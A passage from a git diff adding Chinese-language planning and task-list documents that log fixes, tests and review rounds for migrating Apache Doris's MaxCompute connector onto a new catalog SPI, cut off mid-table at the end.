legacy 文案)+ private→package-private(test-only)。聚合列半 out-of-scope(F31)。**守门**:**全连接器(9)+fe-core compile BUILD SUCCESS**(12 call site,additive default false 唯 converter true)、UT 2/2+2/2+9/9、checkstyle 0×3、import-gate 净、mutation 三向红(连接器 throw / converter 7 参 / equals isAutoInc)。**设计对抗验证**(weepgfhwu) 0 mustFix。**Round 1 impl review**(wj0pwt0u7,4 lens): 6 nit/0 mustFix(converter 测 mock ColumnDefinition=蓄意非真空 / ==0 边界漏 / hashCode 不等 stricter-than-contract 但确定性 / 无钉检查顺序 / 读路径 ConnectorColumnConverter 不带 isAutoInc=正确)。**操作注**:mutation 还原一度因 `cd .../fe` 持久+相对 cp 失败,绝对路径强还+final green 复验(见 auto-memory `doris-build-verify-gotchas`)。**doc-sync 随后续**:更正 migration:117 假声明、decisions-log 登记 isAutoInc 字段。详见 `plan-doc/reviews/P4-T06e-FIX-AUTOINC-REJECT-review-rounds.md`。 + +- **P2-7 FIX-CTAS-IF-NOT-EXISTS(1 轮收敛 0 mustFix,commit `7051b75c197`)**: override 恒 return false + 恒写 editlog,即便连接器在 IFNE 下 no-op 已存在表;`Env.createTable:3752` 直接回传该值 → `CreateTableCommand:103` 不短路 → `CREATE TABLE IF NOT EXISTS ... AS SELECT` 对已存在表执行 INSERT(静默数据变更)(DG-6/F33,minor→major)。**FE-only**。**改 2 文件**:`createTable` 加存在性预检(远端 getTableHandle OR 本地 getTableNullable,镜像 legacy `createTableImpl:178-197` 双探)+ `exists && isIfNotExists()→return true` 跳 create/editlog/cache-reset;路由测 +3(IFNE 远端/本地命中→true+跳副作用、非-IFNE→DdlException 传播)。复用既有 getTableHandle SPI default(其余连接器零影响,本 override 仅 plugin catalog 可达)。**守门**:编译绿、UT 25/25、checkstyle 0、mutation 三向红(return true→false 测1&2 / 去 &&isIfNotExists 测3 / 去 ||getTableNullable 仅测2);注:checkstyle 绑 validate 随 build 跑(删块致 unused var 先 checkstyle 红,故 mutA' 用 return true→false)。**设计对抗验证**(weepgfhwu) 0 mustFix(test-quality 旗标=真空 resetMetaCacheNames 断言 + 缺非-IFNE 测,实现已纳入)。**Round 1 impl review**(wh4ja0geq): 2 候选均证伪——`非-IFNE+仅本地cache命中`不 fail-loud 是 **pre-existing**(P2-7 前该 override 无 FE 预检,此子case 字节一致)、out-of-scope(DG-6 之外)、且远端确缺时建表 outcome 可争议更对。**⚠️ KNOWN PRE-EXISTING GAP**(待用户定,非本 fix 引入):非-IFNE + FE-cache 命中但远端缺 → legacy 抛 ERR_TABLE_EXISTS_ERROR、cutover 静默建表;若要全 parity 可在 `exists && !isIfNotExists()` 加 FE 侧 throw(留 P3/backlog,Rule 3 不扩 scope)。**doc-sync 随后续**:DDL-C5 minor→major、cutover-fix-design CTAS 语义、KNOWN GAP 入 deviations-log。详见 `plan-doc/reviews/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-review-rounds.md`。 + +- **P2-6 FIX-CREATE-DB-PRECHECK(1 轮收敛 0 mustFix,commit `ff52f8fd478`)**: 翻闸后 `createDb:314` 仅查 FE-cache,FE-cache miss+远端 ODPS 已存在该库时 `CREATE DB IF NOT EXISTS` 穿透到 `schemas().create()` 抛 "already exists",违 IFNE 语义(legacy `createDbImpl:110-124` 同查 FE-cache AND 远端 `databaseExist`)(DG-4/F26/F23 major)。**用户定能力门闸**(OQ-1)。**改 5 文件**:① `ConnectorSchemaOps` 加 additive `supportsCreateDatabase()` default false;② `MaxComputeConnectorMetadata` override→true;③ `createDb` gated 远端预检 `if(ifNotExists && metadata.supportsCreateDatabase() && metadata.databaseExists(...)) return;`(保留 FE-cache 快路径,hoist metadata 局部);④ 路由测+3;⑤ 新 `MaxComputeConnectorMetadataCapabilityTest` 钉真 override。**关键**:jdbc/es/trino 同走本 override+有真 databaseExists 但不支持 createDatabase;能力位 false→`&&` 短路(连远端都不查)→ 仍抛 "not supported",**字节不变**(跨连接器行为变化消除,无需 deviation)。非-IFNE+远端已存在 错误文案保持现状(连接器/ODPS 抛,fail-loud,pre-existing out-of-scope)。**守门**:编译 3 模块绿、UT 22/22+1/1、checkstyle 0×3、import-gate 净、mutation 三向红(删预检→测1&2 / 去 gate→测3 `never().databaseExists` 违反 / 连接器 capability false→CapabilityTest)。**设计对抗验证**(weepgfhwu) 0 mustFix(OQ-1 升用户拍板)。**Round 1 impl review**(wsrg9cwne,4 lens): 5 nit/0 mustFix;cross-connector 字节不变经独立核码确认(正面);非-IFNE 文案差×2=pre-existing out-of-scope;&& 序仅推断钉=borderline;测 3 注释机制误述(实测 mutB 红在 `never().databaseExists` 非 createDatabase)**已修**。**doc-sync 随后续**:DDL-C4 重开、task-list「6/6 完成」措辞、deviations-log 非-IFNE 文案偏差+能力门闸决策。详见 `plan-doc/reviews/P4-T06e-FIX-CREATE-DB-PRECHECK-review-rounds.md`。 + +- **P2-5 FIX-DROP-DB-FORCE(1 轮收敛 0 mustFix,commit `99d5c9d527c`)**: 翻闸后 `PluginDrivenExternalCatalog.dropDb` 拿到 `force` 却不转发(SPI `dropDatabase` 无 force 参),连接器 `dropDatabase` 仅 `schemas().delete()` 无表清理 → 非空 schema 上 DROP DB FORCE 退化为非-force(ODPS 不自级联,legacy `dropDbImpl:142-155` 的枚举循环本身为证)(DG-3/F22/F27 major)。**用户定扩 SPI**。**改 5 文件**:① `ConnectorSchemaOps` 加 additive 4 参 `dropDatabase(...,force)` default 委托 3 参(零破坏其余 6 连接器,唯 MaxCompute override);② `MaxComputeConnectorMetadata` 3 参 override 折 4 参,force 时 `listTableNames` 枚举+逐 `dropTable(...,true)`(catch OdpsException→DorisConnectorException fail-loud)再 `dropDb`,镜像 legacy;③ `PluginDrivenExternalCatalog.dropDb` 转发 force(FE 级 bookkeeping 不变=单 logDropDb+unregisterDatabase,无逐表 editlog);④ 路由测 3 stub 升 4 参+2 新 force 转发测;⑤ 新连接器测 `MaxComputeConnectorMetadataDropDbTest`(hand-written recording fake,无 mockito)。**设计对抗验证**(workflow `weepgfhwu`) 0 mustFix;2 nit(listTableNames 裸 RuntimeException 逃逸 / dropDb 传 local dbName)均 pre-existing+out-of-scope(Rule 3,归 DG-3/DG-4 triage)。**守门**:编译 3 模块绿、UT 4/4+19/19、checkstyle 0×3、import-gate 净、mutation 三向红(fe-core force→false / 连接器删 if(force) 块 / dropTable true→false)。**Round 1 impl review**(workflow `wpszxgfau`): 唯一 real(cascade 硬编 `dropTable(...,true)` idempotency-under-race 未被断言钉住,`true→false` mutation 可漏)已修(fake 改记 ifExists+断言钉 `:true`,重测绿+mutation 现红);listTableNames 逃逸 finding 证伪(pre-existing+仍 fail-loud)。**Batch-D 红线**:删 legacy `dropDbImpl` 须待本 fix 落(已落)。**doc-sync 随后续**:T06c §5「记 OQ/可接受」措辞更正、deviations/decisions-log 登记 4 参 overload。详见 `plan-doc/reviews/P4-T06e-FIX-DROP-DB-FORCE-review-rounds.md`。 + +- **P1-4 FIX-PRUNE-PUSHDOWN(1 轮收敛 0 mustFix,commit `072cd545c54`)**: 翻闸后 plugin-driven MaxCompute 读 Nereids `SelectedPartitions` 在 translator 被丢、`MaxComputeScanPlanProvider` 恒传 `requiredPartitions=emptyList` → ODPS read session 跨全分区(DG-1,纯性能/内存回归,行正确;3 lens recon `wszm3u9fv` 无法证伪)。FE 元数据半边 FIX-PART-GATES 已落,缺 translator→SPI→connector 透传(原 READ-C2「②」半)。**用户批准「Fix it」**。**改 4 产线文件**:① `ConnectorScanPlanProvider` 加 6 参 `planScan(...,List requiredPartitions)` **default**(委托 5 参,零破坏其余 6 连接器,唯 MaxCompute override);② `PluginDrivenScanNode` 加 `selectedPartitions` 字段(默认 NOT_PRUNED)+ setter + 纯函数 `resolveRequiredPartitions`(三态 NOT_PRUNED→null/pruned-非空→names/pruned-空→空 list 短路,镜像 legacy `MaxComputeScanNode:718-731`)+ `getSplits` 短路 + 6 参调用;③ `PhysicalPlanTranslator` plugin 分支注入 `setSelectedPartitions`;④ MaxCompute override 6 参 + `toPartitionSpecs` 喂两 read-session 路径(标准+limit-opt)。**契约**:null/空=全部、非空=子集、零分区 fe-core 短路不下达 SPI。**守门**:compile 3 模块绿、UT fe-core 5/5 + maxcompute 3/3、mutation 双向红(去 isPruned 守卫 fe-core 双红 / toPartitionSpecs 恒空 maxcompute 红)、checkstyle 0×3、import-gate 净。**Round 1**(`w31i0vfo5`,11 agent,4 lens): 7 verdict→0 mustFix;4 存活全 test-quality minor(wiring 无 fe-core 端到端 UT,与 `HiveScanNodeTest` 约定一致 + fail-safe + DV-015 live 门);3 证伪(Hudi-SPI 未接=生产不可达+default 惰性+DV-006 deferred / maxcompute 集成测=正确分层 / mutation 覆盖=实测全杀)。**scope 边界**:Hudi-SPI plugin 分支不接(DV-006 deferred)。**KNOWN-LIMITATION**:端到端裁剪 wiring 无 fe-core UT→DV-015(逻辑半 UT+mutation pin,wiring 半 + 真实裁剪由 p2 live `test_max_compute_partition_prune.groovy`+EXPLAIN/profile 覆盖)。**Batch-D 红线**:删 legacy `MaxComputeScanNode` 须待本 fix 落(读裁剪逻辑副本)。**doc-sync 随本 commit**:D-031、DV-015(+补 DV-014 详细段)、FIX-PART-GATES design/review-rounds⚠️更正、D-028⚠️补注。详见 `plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md`。 + +- **P0-1 FIX-OVERWRITE-GATE(2 轮收敛,commit `59699a62f33`)**: `allowInsertOverwrite` 网关接 PluginDriven,但**经新 SPI capability `supportsInsertOverwrite()` 守门**(非 round-1 的 bare instanceof)。改 3 模块:`ConnectorWriteOps` 加 `default supportsInsertOverwrite()=false`;`MaxComputeConnectorMetadata` override true;fe-core 网关 `instanceof PluginDrivenExternalTable && pluginConnectorSupportsInsertOverwrite(...)`(helper 经 catalog→connector→metadata 链查能力,镜像 PhysicalPlanTranslator)+ 拒绝消息更正。**Round 1**(needs-revision): 对抗 review 证伪设计的 bare-instanceof deferral —— jdbc(`supportsInsert=true` 但 `getWriteConfig` 不透传 overwrite)被网关纳入后**静默退化 overwrite→plain INSERT 丢数据**(Rule 12);es/trino(`supportsInsert=false`)被纳入后下游泛化报错。**用户决策=Option A(SPI capability)**。**Round 2**(rawFindings=0 收敛): 4 项 round-1 finding 全关闭,testVacuousRisk=false,contradictsHistory=false。UT 3/3、mutation 还原 bare instanceof 唯回归守门 test (b) 红。⚠️登记: jdbc/es/trino overwrite 现于网关 fail-loud(= legacy 产品行为,从不在 allow-list);pre-existing JDBC getWriteConfig overwrite gap 留另开 ticket(现不可达);新增 SPI 方法默认 false → 现有连接器零行为变更。**Batch-D 红线**: 删 legacy `MaxComputeExternalTable` arm(`InsertOverwriteTableCommand`)须排在本 commit 之后(本 fix 已加 PluginDriven arm)。**doc-sync WIP(未随本 commit)**: HANDOFF :26 round-1 描述更正、decisions-log 登记新 capability+Option A。详见 `plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md`。 + +- **P0-2 FIX-WRITE-DISTRIBUTION(1 轮收敛 0 must-fix,commit `f0adedba20c`)**: 翻闸后 MaxCompute 写走通用 `PhysicalConnectorTableSink`,丢 legacy 动态分区 hash+local-sort("writer has been closed")+ 并行写退化 GATHER(NG-2/NG-4)。**改 4 文件**:① `ConnectorCapability` 加 `SINK_REQUIRE_PARTITION_LOCAL_SORT`;② `MaxComputeDorisConnector.getCapabilities()` 声明 `{SUPPORTS_PARALLEL_WRITE, SINK_REQUIRE_PARTITION_LOCAL_SORT}`(此前无 override=空集→GATHER);③ `PluginDrivenExternalTable.requirePartitionLocalSortOnWrite()`(镜像 `supportsParallelWrite`);④ `getRequirePhysicalProperties()` 重写 legacy 3 分支。**关键修正 vs legacy**:分区列→child output 索引按 **cols 位置**(通用 sink child 投影到 cols 序)非 legacy full-schema 位置。**blast radius**:两能力仅 2+1 reader,唯一另一 `getCapabilities` consumer(`QueryTableValueFunction` 查 `SUPPORTS_PASSTHROUGH_QUERY`)MaxCompute 不声明→不受影响。编译 3 模块绿、checkstyle/import-gate 净、UT 4/4、mutation 唯 T1 红、blast-radius 回归 92/92(含 `RequestPropertyDeriverTest`14/`ShuffleKeyPrunerTest`11)。**Round 1**(`ww1g95bba`,29 agents): rawFindings=8→survived=3→**newGaps=0/disagreements=0/mustFix=0**,3 存活全 `known-degradation`+`matchesDesignIntent=true`(F2/F4=NG-3/P0-3 耦合本设计已登记;F5=T2 reachability,已澄清 javadoc)。ShuffleKeyPruner non-strict 分歧 Phase B 即退(确认更保守无正确性损)。**Batch-D 红线**:删 `PhysicalMaxComputeTableSink`/`bindMaxComputeTableSink` 须待 P0-2+P0-3 双落。**doc-sync WIP(未随本 commit)**: decisions-log 登记新 capability `SINK_REQUIRE_PARTITION_LOCAL_SORT`+MaxCompute 能力集;deviations-log 登记 ShuffleKeyPruner non-strict 少剪 + `enable_strict_consistency_dml=false` 丢 local-sort(legacy parity,非回归)。详见 `plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md`。 + +- **P0-3 FIX-BIND-STATIC-PARTITION(3 轮收敛 0 mustFix,commit `7cc86c66440`)**: 翻闸后 MaxCompute 写走通用 `bindConnectorTableSink`(克隆自 JDBC,按列名 cols 序投影),而 MaxCompute BE/JNI writer **按位置**映射数据到完整表 schema。3 写 blocker 之三:静态分区无列名 INSERT 列数校验抛(F19/F48);另暴非分区/分区重排或部分显式列名静默错列/丢列。legacy `bindMaxComputeTableSink` **无条件** full-schema 投影。**改 6 文件**:① SPI `ConnectorCapability.SINK_REQUIRE_FULL_SCHEMA_ORDER`(连接器按位置写);② `MaxComputeDorisConnector.getCapabilities()` 声明之;③ `PluginDrivenExternalTable.requiresFullSchemaWriteOrder()` reader;④ `BindSink.bindConnectorTableSink` 分支键=该 capability(true→full-schema 投影镜像 legacy,含剔除静态分区列;false→cols 序 JDBC/ES)+ 抽 `selectConnectorSinkBindColumns`;⑤ **回退 P0-2[D-029]** `PhysicalConnectorTableSink.getRequirePhysicalProperties` 分区列索引 cols→full-schema;⑥ `InsertUtils` VALUES 路径加 `UnboundConnectorTableSink` 分支。**判别键三轮收敛**:`!staticPartitionColNames.isEmpty()`(R1 证伪纯动态重排错列)→`!getPartitionColumns().isEmpty()`(R2 证伪非分区 MC 重排/部分错列)→**capability**(R3 收敛=legacy 全 parity)。**Round 1**(`wi3mnjymb`,18 agents):13→8 confirmed(3 major 同根因=投影分支太窄+分布索引不匹配 cols 序 child)。**Round 2**(`wy299gtsh`):1 new major(非分区 MC 按位置写)→capability。**Round 3**(`wlwpw0b2s`):0 mustFix 收敛;1 nit(跨 capability 隐式耦合 LOCAL_SORT⟹FULL_SCHEMA_ORDER)→javadoc 登记。编译 3 模块绿、checkstyle 0×3、import-gate 净、UT 全绿(含 `BindConnectorSinkStaticPartitionTest`5 + `PhysicalConnectorTableSinkTest`6,mutation 双红)。**KNOWN-LIMITATION**:bind 投影无 fe-core analyze harness 单测→DV-014(parity+p2 `test_mc_write_insert` Test 3/3b+`test_mc_write_static_partitions` live 覆盖)。**Batch-D 红线**:删 legacy `bindMaxComputeTableSink`/`PhysicalMaxComputeTableSink` 须待本 fix 落(已落)。**doc-sync WIP(未随本 commit,批量留横切)**:decisions-log[D-030]、deviations-log[DV-014]、cutover-design §4.2 更正、FIX-WRITE-DISTRIBUTION-design index-by-cols superseded。详见 `plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md`。 diff --git a/plan-doc/task-list-batchD-redline-gaps.md b/plan-doc/task-list-batchD-redline-gaps.md new file mode 100644 index 00000000000000..d9543fcd79d98d --- /dev/null +++ b/plan-doc/task-list-batchD-redline-gaps.md @@ -0,0 +1,52 @@ +# Batch-D 红线扩充 — 对抗复审查出的 gap 修复 Task List + +> 来源:`plan-doc/HANDOFF.md` 横切「Batch-D 红线扩充」。2026-06-08 跑 clean-room 对抗 workflow(`wbw4xszrg`,117 agent,13 carrier-unit × inventory→adversarial-verify + 3 critic)复查 Batch-D 设计「zero survivor」声明(行为逻辑副本层面,非仅实例化链)。 +> 全量结果 JSON:`/tmp/claude-1000/-mnt-disk1-yy-git-wt-catalog-spi/.../tasks/wbw4xszrg.output`(gaps/critics 摘录见 `/tmp/wf_gaps.txt` `/tmp/wf_critics.txt`,若清理见 git 历史本表)。 +> 结论:11 gap + 2 critic-only finding。**Critic-2 独立复核 13 条 per-fix 等价物全部 present+wired**(前修无回退)。这些是 per-fix review 漏掉的**新**发现。 +> 流程(沿用 P4-rereview 既有方法论):每 issue = 独立设计文档(`tasks/designs/P4-T06e--design.md`)→ 设计验证 workflow(clean-room 对抗)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ impl-review workflow 收敛 → 独立 commit(`[P4-T06e]`)+ hash 回填 + 本表更新。 + +## 用户定夺(2026-06-08) + +- **G8 = Fix now(repro-test 先行)**——确诊 live 静默丢行,最高优先。 +- **其余 = Fix Tier 1+2,Tier 3 接受+登记 deviation**。 +- **G0 = design-verify Skip + 死代码 Keep/defer Batch-D**(已 DONE `0d983a1c056`)。 +- **下一新 session = 批量修复 G6 + G5 + G7**(三者独立、可并行设计;各仍独立 design doc + 独立 commit + 各自守门)。 + +## 🆕 任务 0 — 翻闸完整性审计(2026-06-08 完成,无新 gap) + +> 用户 2026-06-08 新增:确认所有 maxcompute 操作走新 SPI、零 legacy 回退。= 🅱 Batch-D 删 legacy 的**静态前置门**。 +> **方法**:4 路 clean-room 并行 subagent(read/write/DDL/metadata)逐 op trace「FE 入口→SPI 实现」+「legacy 零可达」+ 主线对抗交叉核查(CatalogFactory/PluginDrivenExternalCatalog 全文、GSON 三注册、batch SPI default)。报告:[`reviews/P4-cutover-completeness-audit-2026-06-08.md`](reviews/P4-cutover-completeness-audit-2026-06-08.md)。 +> **结论:24/24 op 全 ROUTE✅,0 FALLBACK / 0 GAP / 0 新 gap**。max_compute 的 catalog/db/table 运行时恒 `PluginDrivenExternal*`,每处 legacy 分支为 `instanceof MaxCompute*` 守卫、结构性 FALSE;`GsonUtils:411/463/484` 三注册闭 replay。**静态分发面门 = PASS**,Batch-D 静态轴解锁、仍 gated on 🅰 live e2e。本结论**再确认(非信任)** 2026-06-07 domain-6「dispatch 基本干净 / legacy 死而存」裁决(Rule 8/12 不信「已修」标签、4 路独立 clean-room 重建)。审计另**扩充 legacy 删除候选**(新增 MCInsertExecutor/UnboundMaxComputeTableSink/LogicalMaxComputeTableSink+impl 规则/MaxComputeExternalDatabase/MetaCache/SchemaCacheValue/Split),均运行时死、须连同已死分支原子删除。 + +## 进度 + +| # | issue (gap) | sev | 决策 | 设计 | 实现 | 守门 | review | 状态 | +|---|---|---|---|---|---|---|---|---| +| G8 | **FIX-NONPART-PRUNE-DATALOSS** (GAP8) | **blocker/correctness** | Fix(repro 先行) | ✅ | ✅ | ✅ | ✅ 设计验证`wijd3qgk0`4lens design-sound + impl-review`wza2khdb2`2lens approve | ✅ DONE (`e1760d38d86`) | +| G0 | **FIX-DATETIME-PUSHDOWN-FORMAT** (GAP0/1) | major(correctness/perf) | Fix | ✅ | ✅ | ✅ | ✅ 设计验证 skip(用户定)+impl-review 单Agent CHANGES-REQUIRED→F1(CST session 炸整查询)折入 | ✅ DONE (`0d983a1c056`) | +| G6 | **FIX-CREATE-CATALOG-VALIDATION** (GAP6) | major | Fix | ✅ | ✅ | ✅ | ✅ 单Agent APPROVE-WITH-NITS(0 must-fix) | ✅ DONE (`1fc00178484`) | +| G5 | **FIX-AGG-COLUMN-REJECT** (GAP5) | minor | Fix(用户定 Option B: SPI 字段) | ✅ | ✅ | ✅ | ✅ 单Agent APPROVE(0 must-fix) | ✅ DONE (`c5e8ba6d9e2`) | +| G7 | **FIX-VOID-TYPE-MAPPING** (GAP7) | minor | Fix | ✅ | ✅ | ✅ | ✅ 单Agent APPROVE(0 must-fix) | ✅ DONE (`49113dc7860`) | +| G2 | **FIX-PREDICATE-COLGUARD** (GAP2) | minor | Fix | ✅ | ✅ | ✅ | ✅ 单Agent APPROVE(0 must-fix) | ✅ DONE (`fefbbad391d`) | +| GC1 | **FIX-BLOCKID-CAP-CONFIG** (CRITICGAP1) | minor | Fix(用户定 Option A: 全局 Config 透传) | ✅ | ✅ | ✅ | ✅ 单Agent APPROVE-WITH-NITS(0 must-fix) | ✅ DONE (`95575a4954d`) | +| T3 | **Tier-3 DV batch** (GAP3/4/9/10) | minor | 接受+DV | ⬜ | n/a | n/a | n/a | ⬜ | +| DOC | **Batch-D redline 扩充**(design §1/§2 must-land-before-delete + scan-node 注补 LIMIT-split 第 3 副本 + §7 校验 + §8 fe-common 解耦) | — | — | ✅ | n/a | n/a | n/a | ✅ DONE 2026-06-09 | + +图例:⬜ 未开始 / 🔄 进行中 / ✅ 完成 + +## gap 速查(详见各 design + `/tmp/wf_gaps.txt`) + +- **G8 GAP8**:非分区 MC 表 + WHERE → 静默 0 行。`supportInternalPartitionPruned()`=`!partCols.isEmpty()`(非分区=false) → `PruneFileScanPartition` else 支覆写 `isPruned=true,空` → `PluginDrivenScanNode.getSplits` 短路 0 split。根因=FIX-PART-GATES 坏 override(`35cfa50f988`)+ P1-4 短路(`072cd545c54`)叠加。已 5 处核码确认。单测钉错不变式、live-e2e 仅测分区表。见 auto-memory [[catalog-spi-nonpartitioned-prune-dataloss]]。 +- **G0 GAP0/1** ✅ DONE (`0d983a1c056`):DATETIME/TIMESTAMP/TIMESTAMP_NTZ 谓词下推。新路 `MaxComputePredicateConverter` 用 `LocalDateTime.toString()`('T' 分隔)喂 `.SSS/.SSSSSS` formatter → 非 UTC 解析抛 → 整 conjunct 树降为 NO_PREDICATE(谓词永不下推=性能回归);UTC 路推 malformed 字面量;且 source TZ 用 project-region 非 session TZ(format 修后会丢行)。legacy 用 `getStringValue(DatetimeV2Type(3|6))`(空格分隔定长)正确下推。**修**=直接 format `LocalDateTime`(逐字镜像 legacy)+ source TZ 改 `ConnectorSession.getTimeZone()`(TZ id 字符串惰性 `ZoneId.of`,使 Doris 逐字存的 `CST` 等 ZoneId 不认 id 降级 NO_PREDICATE 而非炸查询——impl-review F1 折入)。**Batch-D 死代码清理项**:`MCConnectorEndpoint.resolveProjectTimeZone` + `REGION_ZONE_MAP`(~60 行)翻闸后零调用方。 +- **G6 GAP6** ✅ DONE (`1fc00178484`):CREATE CATALOG 属性校验缺失——`MaxComputeConnectorProvider` 未 override `validateProperties`(继承 no-op);required PROJECT/ENDPOINT、split_byte_size floor、account_format、timeout>0、`checkAuthProperties`(定义但零调用)全不在 CREATE 时校验,退化为 use-time 晚失败/静默接受非法值。**修**=override `validateProperties` 逐字镜像 legacy `checkProperties:388-457` 六校验、抛 IllegalArgumentException(→DdlException)、wire dead `checkAuthProperties`(异常类型对齐 IllegalArgumentException)。UT 19/19 + mutation 3 组向红。 +- **G5 GAP5** ✅ DONE (`c5e8ba6d9e2`):`CREATE TABLE (c INT SUM)` 聚合列拒绝丢失。ConnectorColumn 无 aggType 载体 → converter 丢 → validateColumns 不查 → nereids 非-OLAP 不拒(**证伪 P2-8「非-OLAP 路径已覆盖」**)。静默建普通列。**修**=用户定 Option B:加 SPI additive 字段 `isAggregated`(镜像 P2-8 isAutoInc)+ converter passthrough(=`Column.isAggregated()`)+ `MaxComputeConnectorMetadata.validateColumns` 加 `if(col.isAggregated())throw`(逐字镜像 legacy `:426-429`,紧邻 isAutoInc 检查)。UT 4/4/11 + mutation 3 组向红;over-rejection 已核(isOlap-gated)。 +- **G7 GAP7** ✅ DONE (`49113dc7860`):ODPS `VOID` → 新路映 `UNSUPPORTED`(legacy=`Type.NULL`);`ConnectorColumnConverter` 无 "NULL" case + `createType("NULL")` 抛被吞。次生:未知 OdpsType legacy 硬抛、新路静默 UNSUPPORTED。**修**=连接器局部:① `MCTypeMapping` VOID token "NULL"→"NULL_TYPE"(fe-core convertScalarType default 即产 Type.NULL);② switch default `return UNSUPPORTED`→`throw`(仅 OdpsType.UNKNOWN sentinel 落 default,legacy 亦 throw=parity,真实表零回归)。UT 5/5 + mutation 2 组向红。**out-of-scope(留待 ES 翻闸)**:ES `EsTypeMapping:191` 同款 emit "NULL" latent token bug(其 test 还钉了 buggy token),未修。 +- **G2 GAP2**:列不存在守卫反转——legacy 谓词引用未知列时抛→丢谓词;新路 `formatLiteralValue` odpsType==null 静默引号化→**下推非法谓词**。实务多半不可达(bound 谓词只引真列),低。 +- **GC1 CRITICGAP1**:写 block-id 上限硬编 `20000`,无视 `Config.max_compute_write_max_block_count`(legacy 可调)→ 调优部署静默回归。 + +## Tier-3 接受项(登记 deviation,不修) + +- **GAP3** CREATE DB 非-IFNE:`ERR_DB_CREATE_EXISTS`(1007/HY000,本地预抛) → 透传 ODPS DdlException(P2-6 已注 pre-existing)。 +- **GAP4** DROP TABLE 非-IF-EXISTS+远端缺:`ERR_UNKNOWN_TABLE`(1109/42S02) → 通用 DdlException(本地名)。 +- **GAP9** SHOW PARTITIONS `LIMIT`:legacy paginate-then-sort → 新路 sort-then-paginate(新路更合 ORDER-BY-LIMIT 语义)。 +- **GAP10** partitions() TVF:schema-分区但零实例表 legacy 抛「not partitioned」→ 新路返 0 行(已有 in-code 注释声明 intentional)。 diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md new file mode 100644 index 00000000000000..24a1f28095fe7c --- /dev/null +++ b/plan-doc/task-list.md @@ -0,0 +1,51 @@ +# P4-T06d — 翻闸缺口修复 Task List + +> 来源: `plan-doc/tasks/designs/P4-cutover-fix-design.md`(6 issue) + `plan-doc/reviews/P4-cutover-review-findings.md`(41 存活发现)。 +> 流程(用户定): 每 issue = 独立设计文档 → 修复 → 编译+UT(无 e2e) → 对抗 review agent → review 有问题则回到设计循环(最多 5 轮)→ 记录每轮结论防矛盾 → 全过/到上限再 checkpoint。 +> 每 issue 产物: +> - 设计: `plan-doc/tasks/designs/P4-T06d--design.md`(跨轮更新) +> - review 轮次记录: `plan-doc/reviews/P4-T06d--review-rounds.md`(每轮 finding+verdict+处置) +> - summary: 写回本文件 + 设计文档尾 + +## ▶ RESUME (fresh session 从这里接) + +- **✅ 全部完成(6/6)**: Phase 1 读 —— `4dba013d514`(FIX-READ-DESC)+ `0a545d319f8`(FIX-READ-SPLIT);Phase 2 DDL —— `0d95d837924`(FIX-DDL-ENGINE,1 轮)+ `6c68e502662`(FIX-DDL-REMOTE,2 轮);Phase 3 分区 —— `35cfa50f988`(FIX-PART-GATES,2 轮);Phase 4 写 —— `b31021696e8`(FIX-WRITE-ROWS,1 轮 sound)。 +- **下一步(后续,非本 task 范围)**: ① **live 验证**(真实 ODPS,CI 默认跳)—— 6 fix 的 e2e 全套(`external_table_p2/maxcompute/*` 读/CREATE/DROP/SHOW PARTITIONS/partitions TVF/INSERT affected-rows)= 翻闸真正完成门,需带凭证人工跑。② **doc-sync**(prior-session WIP,本批未混入 commit): Batch-D 设计 :70-77/:102 amendment 措辞("T06c adds"→"FIX-PART-GATES adds")+ decisions-log(D-028 ordering、CACHE-P1 降级、`P4-T05-T06-cutover-design.md:114` "doBeforeCommit 跳过正确" 更正)。③ Batch-D 删 legacy(须排在 6 fix 之后;🔴红线见下)。 +- **FIX-PART-GATES 落地要点**(供防回退): 新 `PluginDrivenSchemaCacheValue`(存 partition 列 + raw 远端名);`PluginDrivenExternalTable` initSchema 填分区列(raw→mapped 经 `fromRemoteColumnName` 桥接)+ 4 override(isPartitionedTable/getPartitionColumns/supportInternalPartitionPruned/getNameToPartitionItems);`getNameToPartitionItems` 单次 `listPartitions` + 复用 `TablePartitionValues.addPartitions`(与 legacy `MaxComputeExternalMetaCache.loadPartitionValues` 同构,ListPartitionItem/isHive=false)再 invert。**决策①**: `supportInternalPartitionPruned()` keyed on `!getPartitionColumns().isEmpty()`(非 legacy MC 无条件 true)——因 override 被 jdbc/es/trino 共享,无条件 true 会改非分区连接器行为。`PartitionsTableValuedFunction` 3 网关只增不删(🔴Batch-D 红线 :173 守住)。`PartitionValuesTableValuedFunction` 不动(仅 HMS,非回归)。per-call 远端 listPartitions 无二级 cache = CACHE-P1 既定方向(登记降级)。 +- **FIX-DDL-REMOTE 落地要点**(供后续防回退): `PluginDrivenExternalCatalog.java` createTable/dropTable 两 override 加 FE 端 local→remote 名解析(createTable `db.getRemoteName()` 喂 converter 第二参、表名不解析=legacy parity;dropTable 精确 mirror base `ExternalCatalog.dropTable:1119-1129` —— **db==null 无条件抛**[非 ifExists-gate,推翻 parent 设计文本]、table==null/handle-absent 才 ifExists)。editlog/cache 仍用本地名(follower-replay)。源码仅 fe-core 2 override;无 import 新增(同包)。Batch-D 协同:勿据 T06c §5:187 已证伪的"连接器内部解析 remote"假定行事。 +- **FIX-DDL-ENGINE 落地要点**(供后续防回退): `CreateTableInfo.java` 两网关加 `PluginDrivenExternalCatalog` 分支 + helper `pluginCatalogTypeToEngine`(`max_compute`→`ENGINE_MAXCOMPUTE`,**其余 SPI 类型返 null**——精炼过 parent 的 default-throw,使 jdbc/es/trino 在两网关均 legacy parity)。Batch-D 顺序依赖:本 fix 先落 PluginDriven 分支,Batch-D 仅删 legacy MC `instanceof` 分支 + `maxcompute.MaxComputeExternalCatalog` import。 +- **⚠️ issue 5 FIX-PART-GATES 前置决策 OQ-6 未定**(见下「关键前置决策」)—— 到 issue 5 前问用户。 +- 每 issue 流程见顶部;commit 已定每 issue 独立。foundational docs(P4-cutover-fix-design.md / review-findings 等)仍未提交(prior session 待 doc-sync,在 disk 上可读)。 + +## 进度 + +| # | issue | phase | sev | layer | 设计 | 实现 | 编译+UT | review 轮次 | 状态 | +|---|---|---|---|---|---|---|---|---|---| +| 1 | FIX-READ-DESC | 1 read | blocker | connector | ✅ | ✅ | ✅ | 3 轮→收敛 | 